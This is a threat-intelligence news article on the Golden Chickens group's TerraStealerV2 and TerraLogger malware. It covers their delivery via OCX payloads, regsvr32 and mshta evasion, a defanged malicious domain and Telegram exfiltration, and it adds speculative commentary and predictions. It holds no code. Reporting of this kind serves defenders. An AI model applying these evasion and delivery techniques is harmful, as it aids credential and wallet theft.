Listen to this Post
Golden Chickens, a persistent cybercriminal group also known as Venom Spider, has re-emerged with two newly identified malware strains: TerraStealerV2 and TerraLogger. These additions to their ever-evolving arsenal highlight the group’s ongoing efforts to refine its tactics and expand its malware-as-a-service (MaaS) offerings.
These developments, reported by the Recorded Future Insikt Group, demonstrate that Golden Chickens remains highly active, even as the broader cybersecurity landscape sees the rise of similarly dangerous threats like Hannibal Stealer, Nullpoint Stealer, and the upgraded StealC V2 malware.
TerraStealerV2 and TerraLogger: What We Know
TerraStealerV2 is engineered for comprehensive data harvesting, targeting sensitive browser information, including:
Login credentials from Chrome’s Login Data database
Cryptocurrency wallet data
Information from browser extensions
The malware is deployed using a variety of file types, including EXEs, DLLs, MSI installers, and LNK shortcuts. A notable characteristic is its use of OCX payloads fetched from the suspicious domain wetransfers[.]io. Once installed, the malware uses trusted Windows tools like regsvr32.exe and mshta.exe to sidestep detection by antivirus systems.
However, there’s a technical shortcoming in TerraStealerV2: it fails to bypass Application Bound Encryption (ABE) in newer versions of Chrome, a sign that the malware may still be under development or simply lagging behind browser security updates.
Captured data is transmitted to both Telegram channels and the aforementioned domain, indicating the use of multiple exfiltration channels to ensure persistence even if one method is blocked.
On the other hand, TerraLogger serves as a standalone keylogger. It captures keystrokes using a low-level keyboard hook and writes them to local storage. Unlike its counterpart, it lacks a built-in data exfiltration mechanism or command-and-control communication, suggesting it’s either a component of a larger malware suite or still in early development stages.
The Golden Chickens Profile
Golden Chickens has operated since at least 2018 and is notorious for its sophisticated malware toolkit. The threat group is known for:
Offering malware under a MaaS model
Developing payloads like More_eggs, VenomLNK, TerraLoader, and TerraCrypt
Operating under the online alias badbullzvenom, reportedly tied to actors in Canada and Romania
Their previously documented malware, such as RevC2 and Venom Loader, demonstrates a consistent focus on credential theft and access facilitation.
The new tools appear to be an extension of these objectives, albeit still in the refinement phase, especially in comparison to more polished Golden Chickens threats of the past.
Rise of Competitors in the Stealer Ecosystem
The cybercrime market is witnessing rapid evolution. Malware such as Hannibal Stealer, Gremlin Stealer, and Nullpoint Stealer are designed to compete in the same territory as TerraStealerV2 by offering similar data-harvesting capabilities.
Of particular note is StealC V2, released in March 2025, which boasts:
Improved payload delivery via MSI and PowerShell
A redesigned, interactive control panel
RC4 encryption for secure C2 communication
Telegram bot integration for real-time notifications
New features like geolocation-based rules, HWID targeting, and server-side brute-force mechanisms
These enhancements reflect the level of sophistication now expected in modern malware, something TerraStealerV2 and TerraLogger are seemingly working toward but have not yet achieved.
What Undercode Say:
Golden
While TerraStealerV2 and TerraLogger are not yet fully matured, their structure indicates a modular design philosophy. Golden Chickens appears to be investing in interoperability across their suite, likely aiming to position themselves for seamless tool integration — a hallmark of advanced persistent threats (APTs).
Analytically speaking, the reliance on OCX files and trusted Windows utilities shows a tactical pivot toward fileless and native execution, mimicking legitimate behavior to avoid detection. However, failure to bypass Chrome’s post-July 2024 ABE shows they are still catching up on defensive advancements.
The exfiltration via Telegram raises questions about operational security. Telegram offers encryption but is not bulletproof. This choice likely reflects a blend of convenience and flexibility rather than strong OPSEC — suggesting these tools are either designed for fast campaigns or lower-tier customers on their MaaS platform.
From a broader threat intelligence standpoint, Golden Chickens is playing catch-up in a market where malware is becoming hyper-specialized. The success of StealC V2, with its streamlined C2 and enhanced payload logic, sets a high bar.
In contrast, TerraLogger’s lack of C2 infrastructure feels more like a prototype than a weaponized product. Its utility could be maximized when deployed alongside more developed malware (e.g., a loader or stealer), or as a plug-in for more targeted campaigns requiring keystroke monitoring rather than bulk credential dumps.
What also stands out is the repeated use of compromised or pseudo-legitimate file-sharing domains like wetransfers[.]io. These choices offer attackers better camouflage in email campaigns or drive-by download scenarios. It’s likely a strategic attempt to bypass URL blacklists and evade automated scanning systems.
In conclusion, Golden Chickens’ toolkit is growing again, but their latest releases suggest a transitional phase. While their infrastructure and naming convention remain consistent, the tools themselves do not yet exhibit the hallmarks of mature deployment — a gap that may close rapidly as the group iterates.
Fact Checker Results:
OCX Payloads: Confirmed delivery method for both malware variants
Telegram Exfiltration: Verified tactic in recent malware analysis
Chrome ABE Limitation: Valid technical observation; post-July 2024 Chrome update complicates data theft
Prediction:
Golden Chickens is likely to release enhanced versions of both TerraStealerV2 and TerraLogger within the next 3–6 months. These will likely include:
Improved Chrome decryption modules
Full C2 integration for TerraLogger
More robust encryption for exfiltrated data
Payload customization through builder GUIs similar to StealC V2
The group will probably continue investing in MaaS adaptability, streamlining their malware suite to serve both elite threat actors and script kiddies alike. As threat competition intensifies, expect increased convergence of stealer, loader, and keylogger functionalities in Golden Chickens’ future releases.
References:
Reported By: thehackernews.com
Extra Source Hub:
https://www.medium.com
Wikipedia
Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
